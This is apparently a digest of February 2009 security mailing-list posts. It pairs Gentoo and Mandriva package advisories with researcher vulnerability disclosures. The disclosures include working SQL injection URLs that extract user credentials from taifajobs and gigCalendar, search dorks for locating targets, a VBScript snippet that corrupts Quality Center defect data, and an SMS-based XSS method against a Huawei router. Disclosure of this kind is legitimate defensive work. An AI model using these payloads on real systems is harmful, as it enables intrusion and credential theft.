[ GLSA 200902-06 ] GNU Emacs, XEmacs: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200902-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GNU Emacs, XEmacs: Multiple vulnerabilities Date: February 23, 2009 Bugs: #221197, #236498 ID: 200902-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Two vulnerabilities were found in GNU Emacs, possibly leading to user-assisted execution of arbitrary code. One also affects edit-utils in XEmacs. Background == GNU Emacs and XEmacs are highly extensible and customizable text editors. edit-utils are miscellaneous extensions to XEmacs. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 app-editors/emacs < 22.2-r3 >= 22.2-r3 *>= 21.4-r17 < 19 2 app-xemacs/edit-utils < 2.39>= 2.39 --- 2 affected packages on all of their supported architectures. --- Description === Morten Welinder reports about GNU Emacs and edit-utils in XEmacs: By shipping a .flc accompanying a source file (.c for example) and setting font-lock-support-mode to fast-lock-mode in the source file through local variables, any Lisp code in the .flc file is executed without warning (CVE-2008-2142). Romain Francoise reported a security risk in a feature of GNU Emacs related to interacting with Python. The vulnerability arises because Python, by default, prepends the current directory to the module search path, allowing for arbitrary code execution when launched from a specially crafted directory (CVE-2008-3949). Impact == Remote attackers could entice a user to open a specially crafted file in GNU Emacs, possibly leading to the execution of arbitrary Emacs Lisp code or arbitrary Python code with the privileges of the user running GNU Emacs or XEmacs. Workaround == There is no known workaround at this time. Resolution == All GNU Emacs users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-editors/emacs-22.2-r3" All edit-utils users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-xemacs/edit-utils-2.39" References == [ 1 ] CVE-2008-2142 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2142 [ 2 ] CVE-2008-3949 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3949 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200902-06.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ MDVSA-2009:051 ] libpng
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:051 http://www.mandriva.com/security/ ___ Package : libpng Date: February 23, 2009 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: A number of vulnerabilities have been found and corrected in libpng: Fixed 1-byte buffer overflow in pngpread.c (CVE-2008-3964). This was allready fixed in Mandriva Linux 2009.0. Fix the function png_check_keyword() that allowed setting arbitrary bytes in the process memory to 0 (CVE-2008-5907). Fix a potential DoS (Denial of Service) or to potentially compromise an application using the library (CVE-2009-0040). The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3964 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5907 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0040 ___ Updated Packages: Mandriva Linux 2008.0: 998ac96ae507c96bc3bf5180319412e7 2008.0/i586/libpng3-1.2.22-0.3mdv2008.0.i586.rpm acbb66ecf6c7ad53d171aa3958d58abf 2008.0/i586/libpng-devel-1.2.22-0.3mdv2008.0.i586.rpm c2648d20ebe13e5d954f24876a14e513 2008.0/i586/libpng-source-1.2.22-0.3mdv2008.0.i586.rpm 388af16c0f685b8cd726e0ace52b60ce 2008.0/i586/libpng-static-devel-1.2.22-0.3mdv2008.0.i586.rpm b27dd859afb25f890d7d6b2030dc5271 2008.0/SRPMS/libpng-1.2.22-0.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 7c69863bb4054d737a898e039bcd61d4 2008.0/x86_64/lib64png3-1.2.22-0.3mdv2008.0.x86_64.rpm 99b8f97c3f5df41a0b72cb6ca1962d60 2008.0/x86_64/lib64png-devel-1.2.22-0.3mdv2008.0.x86_64.rpm 823d4ae86d6367d4364ad7f7ba0285f6 2008.0/x86_64/lib64png-static-devel-1.2.22-0.3mdv2008.0.x86_64.rpm 110e19b8057b5d3711476e66ce27a8c4 2008.0/x86_64/libpng-source-1.2.22-0.3mdv2008.0.x86_64.rpm b27dd859afb25f890d7d6b2030dc5271 2008.0/SRPMS/libpng-1.2.22-0.3mdv2008.0.src.rpm Mandriva Linux 2008.1: 1b179e2b3487869c27b207017dff48d3 2008.1/i586/libpng3-1.2.25-2.2mdv2008.1.i586.rpm f7eab7bb5141d479c6c503d9d1f6 2008.1/i586/libpng-devel-1.2.25-2.2mdv2008.1.i586.rpm ca12104e547b7faf7ba1018ef244aa88 2008.1/i586/libpng-source-1.2.25-2.2mdv2008.1.i586.rpm 8902a48738d5729160f31e37fc46a9f2 2008.1/i586/libpng-static-devel-1.2.25-2.2mdv2008.1.i586.rpm 2a7f7d02d232ce9948359377ba1e1ffb 2008.1/SRPMS/libpng-1.2.25-2.2mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 2b1949ee8868bb7475310de66478640e 2008.1/x86_64/lib64png3-1.2.25-2.2mdv2008.1.x86_64.rpm 4abeaf3ca19d4660b5ee1d22451413d5 2008.1/x86_64/lib64png-devel-1.2.25-2.2mdv2008.1.x86_64.rpm 7aa2e1a738a12c633dcf1d1d5b7acd6e 2008.1/x86_64/lib64png-static-devel-1.2.25-2.2mdv2008.1.x86_64.rpm 702d85b49120f5422db08345fc697758 2008.1/x86_64/libpng-source-1.2.25-2.2mdv2008.1.x86_64.rpm 2a7f7d02d232ce9948359377ba1e1ffb 2008.1/SRPMS/libpng-1.2.25-2.2mdv2008.1.src.rpm Mandriva Linux 2009.0: db67f1e4b8a43986f03f718ad4d7120e 2009.0/i586/libpng3-1.2.31-2.1mdv2009.0.i586.rpm 02a423cae16e9c656129601f1ae69600 2009.0/i586/libpng-devel-1.2.31-2.1mdv2009.0.i586.rpm f91a68467b81b3f532ef21b4ff9c9516 2009.0/i586/libpng-source-1.2.31-2.1mdv2009.0.i586.rpm 0f28993456fd4c012385aa11baba2f7e 2009.0/i586/libpng-static-devel-1.2.31-2.1mdv2009.0.i586.rpm 99962c17399bba390d4996e09f7cfd28 2009.0/SRPMS/libpng-1.2.31-2.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 6c9a8ddfc4872957863cad6b24e8a3ac 2009.0/x86_64/lib64png3-1.2.31-2.1mdv2009.0.x86_64.rpm 3d25e33a29512b1aca2ce738b8f5f349 2009.0/x86_64/lib64png-devel-1.2.31-2.1mdv2009.0.x86_64.rpm a0e049c7090222715957c8db4bf102b5 2009.0/x86_64/lib64png-static-devel-1.2.31-2.1mdv2009.0.x86_64.rpm 7611de5e02c238f6b8338fd49e07fcfa 2009.0/x86_64/libpng-source-1.2.31-2.1mdv2009.0.x86_64.rpm 99962c17399bba390d4996e09f7cfd28 2009.0/SRPMS/libpng-1.2.31-2.1mdv2009.0.src.rpm Corporate 3.0: 0ea2e361290b0c8aceb44c3534939ed5 corporate/3.0/i586/libpng3-1.2.5-10.11.C30mdk.i586.rpm 032c61ff00b460854757cd55b32d5d2a corporate/3.0/i586/libpng3-devel-1.2.5-10.11.C30mdk.i586.rpm 3bcfeddfcbb1c695a3a0a9b44850ad27 corporate/3.0/i586/libpng3-static-devel-1.2.5-10.11.C30mdk.i586.rpm 4bf80d3855abcfde33835c4bc4ebad4d corporate/3.0/SRPMS/libpng-1.2.5-10.11.C30mdk.src.rpm Corporate 3.0/X86_64: 57ee9252923d33d66a1787a9a68174a4 corporate/3.0/x86_64/lib64png3-1.2.5-10.11.C30mdk.x86_64.rpm c8c47259e3eb68c1c71be2a90ac1cde9 corporate/3.0/x86_64/lib64png3-devel-1.2.5-10.11.C30mdk.x86_64.rpm 2370808839b2f59ded6bc1b59f437801 corporate/3
[ GLSA 200902-05 ] KTorrent: Multiple vulnerabilitites
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200902-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: KTorrent: Multiple vulnerabilitites Date: February 23, 2009 Bugs: #244741 ID: 200902-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Two vulnerabilities in the web interface plugin in KTorrent allow for remote execution of code and arbitrary torrent uploads. Background == KTorrent is a BitTorrent program for KDE. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-p2p/ktorrent < 2.2.8 >= 2.2.8 Description === The web interface plugin does not restrict access to the torrent upload functionality (CVE-2008-5905) and does not sanitize request parameters properly (CVE-2008-5906) . Impact == A remote attacker could send specially crafted parameters to the web interface that would allow for arbitrary torrent uploads and remote code execution with the privileges of the KTorrent process. Workaround == Disabling the web interface plugin will prevent exploitation of both issues. Click "Plugins" in the configuration menu and uncheck the checkbox left of "WebInterface", then apply the changes. Resolution == All KTorrent users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-p2p/ktorrent-2.2.8" References == [ 1 ] CVE-2008-5905 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5905 [ 2 ] CVE-2008-5906 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5906 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200902-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ MDVSA-2009:050-1 ] python-pycrypto
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:050-1 http://www.mandriva.com/security/ ___ Package : python-pycrypto Date: February 23, 2009 Affected: 2009.0 ___ Problem Description: A vulnerability have been discovered and corrected in PyCrypto ARC2 module 2.0.1, which allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large ARC2 key length (CVE-2009-0544). The updated packages have been patched to prevent this. Update: The previous update package was not signed. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0544 ___ Updated Packages: Mandriva Linux 2009.0: e50d00d0c1a180f214ba9ad5d712e4e4 2009.0/i586/python-pycrypto-2.0.1-4.2mdv2009.0.i586.rpm 610275bf3bcc33e324cc42ea1a1e0021 2009.0/SRPMS/python-pycrypto-2.0.1-4.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 77071b620a3b193ddc50bcc7e60873be 2009.0/x86_64/python-pycrypto-2.0.1-4.2mdv2009.0.x86_64.rpm 610275bf3bcc33e324cc42ea1a1e0021 2009.0/SRPMS/python-pycrypto-2.0.1-4.2mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJotS4mqjQ0CJFipgRApphAJ93bx8hHgq9sqP9Kif8yIf5dBB4jQCfTdF9 EGojZQaxyi5w7NSFtX29qFA= =IOaM -END PGP SIGNATURE-
[ECHO_ADV_103$2009] taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability
ECHO_ADV_103$2009 - [ECHO_ADV_103$2009] taifajobs <= 1.0 (jobid) Remote SQL Injection Vulnerability - Author : K-159 Date : February, 23 th 2009 Location : Jakarta, Indonesia Web : http://e-rdc.org/v1/news.php?readmore=126 Critical Lvl : Medium Impact : Manipulation of data / Exposure of sensitive information Where: From Remote --- Affected software description: ~~ Application : taifajobs version : <= 1.0 Vendor : http://sourceforge.net/projects/taifajobs Description : In job recruitment system job seekers and recruiters post their details. The job seekers create an online resume on their profiles and recruiters can add the organization's information, post & manage job advertisements & applications. --- Vulnerability: Input passed to the "jobid" parameter in jobdetails.php page is not properly verified before being used in sql queries.This vulnerability can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows attacker retrieving users email,loginname and md5 hash password. Poc/Exploit: http://www.example.com/[path]/jobdetails.php?jobid=-5 union select 1,2,3,4,5,6,concat(admin,0x3a,email,0x3a,loginname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0 from users-- Dork: ~~~ Google : N/A Solution: ~ - Edit the source code to ensure that input is properly verified. Timeline: ~~~ - 12 - 02 - 2009 bug found - 13 - 02 - 2009 vendor contacted but no response - 23 - 02 - 2009 advisory released --- Shoutz: ~~~ ~ ping - my dearest wife, zautha - my beloved son, and my next beloved daughter "welcome to the world". ~ y3dips,the_day (congratz for the baby),Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001, the_hydra,neng chika, str0ke ~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES ~ SK,Abond,pokley,cybertank, super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed ~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus, kuntua, stev_manado,nofry,k1tk4t,0pt1c,k1ngk0ng ~ newbie_hac...@yahoogroups.com ~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com ~ #aikmel #e-c-h-o @irc.dal.net --- Contact: K-159 || echo|staff || adv[at]e-rdc[dot]org Homepage: http://www.e-rdc.org/ [ EOF ] --
HP Quality Center vulnerability
Find below the details of a vulnerability in the HP Quality Center product (formely Mercury Quality Center). Introduction -- Quality Center (QC) is a web-based QA testing and management tool. It is a product from HP when they took over Mercury Interactive last year. The front-end of the application is composed of COM components that plug into the web browser. Quality Center provides a customization capability (called workflow) which allow the administrator to modify the default behavior. This workflow is driven by VBScript functions that are called whenever a particular event occurs on the client front-end. In order to optimize the interaction speed of the application, a cache folder is created on the client machine. By default, this folder is located at %tmp%/TD_80. Whenever a user connects to a Quality Center project, 2 folders are created within the cache folder. One of these folders contain a copy of the workflow scripts used to customize the application. Indeed, those files are required on the client machine because the workflow is execute on the client, not on the server. There exists 1 VBScript workflow file per feature. Those are: * Login/Logout (common.tds) * Defects module (defects.tds) * Manual Test Execution (manrun.tds) * Test Requirements module (req.tds) * Test Lab module (testlab.tds) * Test Plan module (testplan.tds) The customization feature of Quality Center is often used for: * Controlling password compliance (no blank password, more than 8 letters, etc.) * Chained lists (when a value is selected in a field, another field gets updated with a list relevant to that value) * Automatic updates to some QC components (Test, Test Set, Defect objects, hidden fields) * Hidding information depending on the user's group (used when a project is shared with different vendors) * Others The workflow is often driven by using the OTA (Open Test Architecture), the Quality Center API. This API allows the manipulation of any QC object (e.g. Subject folder, Test/Defect objects, Fields, etc.). It also allows the direct manipulation of the database used by Quality Center. Issue --- When a user connects to Quality Center, the cache folder is automatically updated with the latest VBScript workflow files. Those files are then read by the QC front-end only once for the whole session. They are then used by the application whenever the associated events are raised. There are 2 main points that make this workflow highly vulnerable: 1. Those files are written in plain text; 2. Marking those files as read-only (through the file properties) will prevent Quality Center from overwriting them. If a user modifies this file and then mark it as read-only, he can execute arbitrary code. As the OTA API allows access to the database, he can also modify the data stored in the database as follows: * Quality Center 9.2 (Unconfirmed) - Severity High: user has higher capability than defined by their profile * Quality Center 9.0 Patch < 17 - Severity Highly Critical: a user (even with a Viewer profile) can amend the data rendering it useless. He will also have higher capability than defined by their profile * Quality Center 8.2 / 8.0 (Unconfirmed) - Severity Highly Critical: a user (even with a Viewer profile) can amend the data rendering it useless. He will also have higher capability than defined by their profile * TestDirector (Any Version) - TestDirector is the former name of Quality Center - Potentially the same issues as for Quality Center 9.0 Patch < 17 Please note that HP has released a patch that fixes this issue, please contact HP support for further details. Example This really short example shows how a user can simply change the content of all the defects to some meaningless values: Sub Defects_Bug_MoveTo Set objCommand = TDConnection.Command objCommand.CommandText = "UPDATE BUG SET BG_SUMMARY='Useless', BG_DESCRIPTION='Useless'" objCommand.Execute End Sub Other Information - Discovered By: Exposit Limited Internet:http://www.exposit.co.uk Exposit Limited is a functional testing consultancy company specialized in HP (formely Mercury) Testing Tools.
gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection
*** Salvatore "drosophila" Fresta ***
Application:gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version:gigCalendar 1.0
Bug:* SQL Injection
Exploitation: Remote
Dork: inurl:"index.php?option=com_gigcal"
Date: 21 Feb 2009
Discovered by:Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophila...@gmail.com
*
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: venuedetails.php
This bug allows a guest to view username and
password of a registered user.
http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_venues_id=-1'
UNION ALL SELECT 1,concat('username: ',
username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password:
', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23
*
--
Salvatore "drosophila" Fresta
CWNP444351
XSS Attack using SMS to Optus/Huawei E960 HSDPA Router
XSS Attack using SMS to Optus/Huawei E960 HSDPA Router
Synopsis
Huawei E960 HSDPA Router (firmware version 246.11.04.11.110sp04) is vulnerable
to XSS attack using SMS. One of the feature of this router is the ability to
send and receive SMS through its web interface. The SMS text is presented
unescaped/unfiltered on the inbox view, and an attacker can craft malicious
short messages to gain control over victims router.
Details
The first 32 characters of every incoming SMS is presented in unescaped form in
the inbox view. The 32 characters limit can be overcome by using several
messages, and inserting javascript comment to merge the current message with
the next one.
Example:
First message ends with /* which will comment the all the HTML code up to the
second message
alert('hello '/*
and the second message will start with */ that will close the comment and
continue the script:
*/+'world');
Note that newest message is presented first, so the order of the SMS sending
must be reversed.
Impact
--
An attacker can
- get victim's PPP password by accessing /js/connection.js
- disconnect victim's internet connection
- send SMS with victim's router
- gain access to victim's WIFI password
Recovery
After an attack is performed, the inbox page can not be used to delete the
received messages (because the delete button doesn't work anymore). To remove
offending messages from the inbox, telnet to the router with username 'admin'
and password 'admin'. Huawei E960 uses busybox shell, so standard rm command
can be used to remove the messages (it is located at /tmp/sms/inbox_sms). After
removing the message content, the deleted messages will still be in the inbox
index, but it can now be removed from the inbox page.
Credits
---
Rizki Wicaksono (www.ilmuhacking.com) found this vulnerability. The Indonesian
article at
http://www.ilmuhacking.com/web-security/xss-attack-using-sms-huawei-e960-hsdpa-router/
gives more detail about this vulnerability. This English translation/summary
was done by Yohanes Nugroho.
gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection
*** Salvatore "drosophila" Fresta ***
Application:gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version:gigCalendar 1.0
Bug:* SQL Injection
Exploitation: Remote
Dork: inurl:"index.php?option=com_gigcal"
Date: 21 Feb 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophila...@gmail.com
*
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: banddetails.php
This bug allows a guest to view username and
password of a registered user.
http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
FROM jos_users%23
*
--
Salvatore "drosophila" Fresta
CWNP444351
gigCalendar Joomla Component 1.0 SQL Injection
*** Salvatore "drosophila" Fresta ***
Application:gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version:gigCalendar 1.0
Bug:* SQL Injection
Exploitation: Remote
Dork: inurl:"index.php?option=com_gigcal"
Date: 21 Feb 2009
Discovered by:Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophila...@gmail.com
*
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: banddetails.php
This bug allows a guest to view username and
password of a registered user.
http://www.site.com/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
from jos_users%23
*
--
Salvatore "drosophila" Fresta
CWNP444351
[ MDVSA-2009:050 ] python-pycrypto
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:050 http://www.mandriva.com/security/ ___ Package : python-pycrypto Date: February 20, 2009 Affected: 2009.0 ___ Problem Description: A vulnerability have been discovered and corrected in PyCrypto ARC2 module 2.0.1, which allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large ARC2 key length (CVE-2009-0544). The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0544 ___ Updated Packages: Mandriva Linux 2009.0: 408f60e091c28ab304bed71fd4fb31e6 2009.0/i586/python-pycrypto-2.0.1-4.1mdv2009.0.i586.rpm 469e8ca8ca83ab6a8e6a7a678fd2d197 2009.0/SRPMS/python-pycrypto-2.0.1-4.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: b5ccb51f68d70b10f93aca1785e8b90d 2009.0/x86_64/python-pycrypto-2.0.1-4.1mdv2009.0.x86_64.rpm 469e8ca8ca83ab6a8e6a7a678fd2d197 2009.0/SRPMS/python-pycrypto-2.0.1-4.1mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJnxofmqjQ0CJFipgRAtxtAKCdwq2i23Z1ngaQ4OQTH0K9daxDKACdHayk 4RfwxbK2y7Q9xKJfzo/4xOQ= =6ODp -END PGP SIGNATURE-
[ MDVSA-2009:049 ] pycrypto
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:049 http://www.mandriva.com/security/ ___ Package : pycrypto Date: February 20, 2009 Affected: 2008.0, 2008.1, 2009.0, Corporate 4.0 ___ Problem Description: A vulnerability have been discovered and corrected in PyCrypto ARC2 module 2.0.1, which allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large ARC2 key length (CVE-2009-0544). The updated packages have been patched to prevent this. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0544 ___ Updated Packages: Mandriva Linux 2008.0: 4de11f080f4dfd01695c0627f02c4c6a 2008.0/i586/pycrypto-2.0.1-1.1mdv2008.0.i586.rpm 1cd88426fcdb24d629b0fb4ec0314ce1 2008.0/SRPMS/pycrypto-2.0.1-1.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 90069f7c2307626f0b09ea93ce1313ab 2008.0/x86_64/pycrypto-2.0.1-1.1mdv2008.0.x86_64.rpm 1cd88426fcdb24d629b0fb4ec0314ce1 2008.0/SRPMS/pycrypto-2.0.1-1.1mdv2008.0.src.rpm Mandriva Linux 2008.1: e3897524dbf402bb3b4bf3f0f778b8d5 2008.1/i586/pycrypto-2.0.1-2.1mdv2008.1.i586.rpm 0ec575b2b3972f9dced1b831b2c35fec 2008.1/SRPMS/pycrypto-2.0.1-2.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 512f5b30b52e9b2ab9bad3e98674bb07 2008.1/x86_64/pycrypto-2.0.1-2.1mdv2008.1.x86_64.rpm 0ec575b2b3972f9dced1b831b2c35fec 2008.1/SRPMS/pycrypto-2.0.1-2.1mdv2008.1.src.rpm Mandriva Linux 2009.0: 88819dec46e49db09a2adec77c6e7144 2009.0/i586/pycrypto-2.0.1-3.1mdv2009.0.i586.rpm 284d315d31be7c9c4653e08b913ba380 2009.0/SRPMS/pycrypto-2.0.1-3.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: a73c8d582e79e88a3b41b146ac137c7d 2009.0/x86_64/pycrypto-2.0.1-3.1mdv2009.0.x86_64.rpm 284d315d31be7c9c4653e08b913ba380 2009.0/SRPMS/pycrypto-2.0.1-3.1mdv2009.0.src.rpm Corporate 4.0: a1098e064ef48bbeb7c29bbb3856d20e corporate/4.0/i586/pycrypto-2.0-1.1.20060mlcs4.i586.rpm 2b36370cb7c50e2e97754835685ff5b5 corporate/4.0/SRPMS/pycrypto-2.0-1.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 7c44b73cf1fd308b015abd1e7b710972 corporate/4.0/x86_64/pycrypto-2.0-1.1.20060mlcs4.x86_64.rpm 2b36370cb7c50e2e97754835685ff5b5 corporate/4.0/SRPMS/pycrypto-2.0-1.1.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFJnxSWmqjQ0CJFipgRArbeAJ0ZKypJacu52Jh48WOW6uK5bVozsACgg95N n6VQX0YdwrbMP/PXRJ/jhd0= =f/0D -END PGP SIGNATURE-
[ MDVSA-2009:048 ] epiphany
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:048 http://www.mandriva.com/security/ ___ Package : epiphany Date: February 20, 2009 Affected: 2008.1, 2009.0 ___ Problem Description: Python has a variable called sys.path that contains all paths where Python loads modules by using import scripting procedure. A wrong handling of that variable enables local attackers to execute arbitrary code via Python scripting in the current Epiphany working directory (CVE-2008-5985). This update provides fix for that vulnerability. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5985 ___ Updated Packages: Mandriva Linux 2008.1: 39b5f6f845204481caf4a2b47c5d0a68 2008.1/i586/epiphany-2.22.0-4.7mdv2008.1.i586.rpm 92fdad57cb91f6cf722d1e31165d0edf 2008.1/i586/epiphany-devel-2.22.0-4.7mdv2008.1.i586.rpm 24434a32b8340959ac3a071094d064b7 2008.1/SRPMS/epiphany-2.22.0-4.7mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: b35d75332c54653e6dc2ec41c84a4424 2008.1/x86_64/epiphany-2.22.0-4.7mdv2008.1.x86_64.rpm 889d95c23ef5afde6eae1ccd98e2433b 2008.1/x86_64/epiphany-devel-2.22.0-4.7mdv2008.1.x86_64.rpm 24434a32b8340959ac3a071094d064b7 2008.1/SRPMS/epiphany-2.22.0-4.7mdv2008.1.src.rpm Mandriva Linux 2009.0: bd178708efd25e7d367742bda02cf9fc 2009.0/i586/epiphany-2.24.0.1-3.4mdv2009.0.i586.rpm a5c5a31a18d8dbd30ba8be79969ec7d0 2009.0/i586/epiphany-devel-2.24.0.1-3.4mdv2009.0.i586.rpm 1fcdd0b2282f173a9bba98a703a9a547 2009.0/SRPMS/epiphany-2.24.0.1-3.4mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 59f02a533a103c731df648787045ba82 2009.0/x86_64/epiphany-2.24.0.1-3.4mdv2009.0.x86_64.rpm 04e340d36770c77b9ced0592194b6ac0 2009.0/x86_64/epiphany-devel-2.24.0.1-3.4mdv2009.0.x86_64.rpm 1fcdd0b2282f173a9bba98a703a9a547 2009.0/SRPMS/epiphany-2.24.0.1-3.4mdv2009.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 